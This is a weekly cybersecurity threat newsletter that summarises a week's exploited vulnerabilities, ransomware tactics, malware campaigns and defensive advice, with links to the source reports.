Cyber Threat Weekly – #62
The week of January 20th through January 26th, around 369 cyber news articles were reviewed. A light amount of cyber threat trends and adversarial behavior news to share. Fundamentals performed with excellence wins championships.
In the case of cybersecurity, fundamentals performed with excellence can minimize organizational impact from cyber-attacks. Simplicity and principle-based security applied to everything is the key to good risk management.
Let’s start with ransomware affiliates abuse ESXi via SSH tunnels. Complex but doable Windows RID hijacking to create hidden admin account. X-Force Cloud Threat Landscape Report 2024. Researchers share Palo Alto firewall bugs.
New fake web pages abusing popular brands Reddit and WeTransfer. Threat actors chaining multiple Ivanti bugs in Cloud Service Appliances (CSA). New BackConnect (BC) malware linked to QakBot, with some enhancements.
Looking back at the ransomware threat landscape in 2024.
Broken Record Alert: Please patch N-day bugs!!!
Known exploited software flaws are one of the top 5 initial access vectors. We continue to share n-day vulnerabilities being actively exploited. You can prioritize starting with the CISA known exploited vulnerability (KEV) catalog.
A close #2 priority is flaws with weaponized proof of concept (PoC) code available. Exploit chances are higher with weaponized PoC code available. If you do nothing else with patching, have an emergency 24-to-48-hour patching process for exploited and weaponized PoC code available vulnerabilities.
You should consider what is exposed to the Internet. Architecture and zero trust network access (ZTNA) can go a long way to minimizing the number of devices exposed to the Internet.
CISA Known Exploited Vulnerabilities – January 20th to January 26th:
CVE-2020-11023 – JQuery Cross-Site Scripting (XSS) Vulnerability:
When passing maliciously formed, untrusted input enclosed in HTML tags, JQuery's DOM manipulators can execute untrusted code in the context of the user's browser.
CVE-2025-23006 – SonicWall SMA1000 Appliances Deserialization Vulnerability:
Affecting SonicWall SMA1000 Appliance Management Console (AMC) and Central Management Console (CMC), can enable a remote, unauthenticated attacker to execute arbitrary OS commands.
ESXi Abused via SSH Tunnels by Ransomware Affiliates
Ransomware threat actors are using SSH for persistence and defense evasion abusing ESXi infrastructure. Building an SSH tunnel using a SOCKS proxy for command and control and a network pivot. One would think VMware infrastructure would be considered critical, at least the host server itself at a minimum. Proper egress filtering, access controls, logging and monitoring would minimize an adversary’s ability to abuse this attack vector.
https://www.sygnia.co/blog/esxi-ransomware-ssh-tunneling-defense-strategies/
Hidden Windows Admin Account via RID Hijacking
While this attack vector takes some effort, it is being accomplished. The goal, a hidden low privileged account with admin access that is difficult to detect. An existing user account, guest account or new account can be utilized.
https://asec.ahnlab.com/en/85942/
X-Force Cloud Threat Landscape Report 2024
Researchers share various aspects of cloud security and metrics that were observed. Infostealers are abundant and so are cloud credentials. Security rules failures are listed for both 100% cloud environments and hybrid environments.
https://www.ibm.com/downloads/documents/us-en/10a99803d4afd20a
Researchers Found Palo Alto Firewall UEFI Firmware Bugs
Using purchased Palo Alto PA-3260, PA-1410, and PA-415 firewalls, researchers test for bugs. They found UEFI bugs, it takes vulnerability exploitation to abuse them. Following secure management interface best practices can minimize impact.
https://www.csoonline.com/article/3809061/palo-alto-networks-firewalls-have-uefi-flaws-secure-boot-bypasses.html
https://eclypsium.com/research/pandoras-box-vulns-in-security-appliances/
Fake Reddit and WeTransfer Pages Distribute LummaStealer
Same behavior, different lures. Abusing popular brands adds to legitimacy, helping threat actors snare more victims. Social engineering continues to be a hot tactic. The researcher is not sure how victims reach the fake pages, but most likely via malvertising, SEO poisoning, direct messages, and other social engineering behavior.
Ivanti Bugs Chained to Pwn Ivanti Cloud Service Appliance (CSA)
CISA and the FBI release an advisory detailing multiple bugs used to gain access, credentials, run code, and install webshells on CSA 4.6 which is End-of-Life (EoL). There are four bugs and two different chains. Behavior and indicators of compromise are shared. Lifecycle management is important, minimize the use of unsupported infrastructure.
https://www.darkreading.com/vulnerabilities-threats/cisa-ivanti-vulns-chained-attacks
https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-022a
New Enhanced BackConnect (BC) Malware Linked to QakBot
Researchers revealed a new BC malware that has references to Qbot in the code. The BC module was observed on infrastructure delivering Zloader, another malware loader recently used by the Black Basta ransomware gang.
https://thehackernews.com/2025/01/qakbot-linked-bc-malware-adds-enhanced.html
https://medium.com/walmartglobaltech/qbot-is-back-connect-2d774052369f
2024 Reflection of the Ransomware Threat Landscape
Researchers share the top affiliate programs and noteworthy ransomware gangs. Interesting is the overlapping heat map of ransomware threat actor TTP’s showing many commonalities of behavior across multiple affiliates.
31337 InfoSec - Cyber Threat Weekly - Derek Krein Newsletter
Join the newsletter to receive the latest updates in your inbox.
Comments
Sign in to join the conversation.
Just enter your email below to receive a login link.
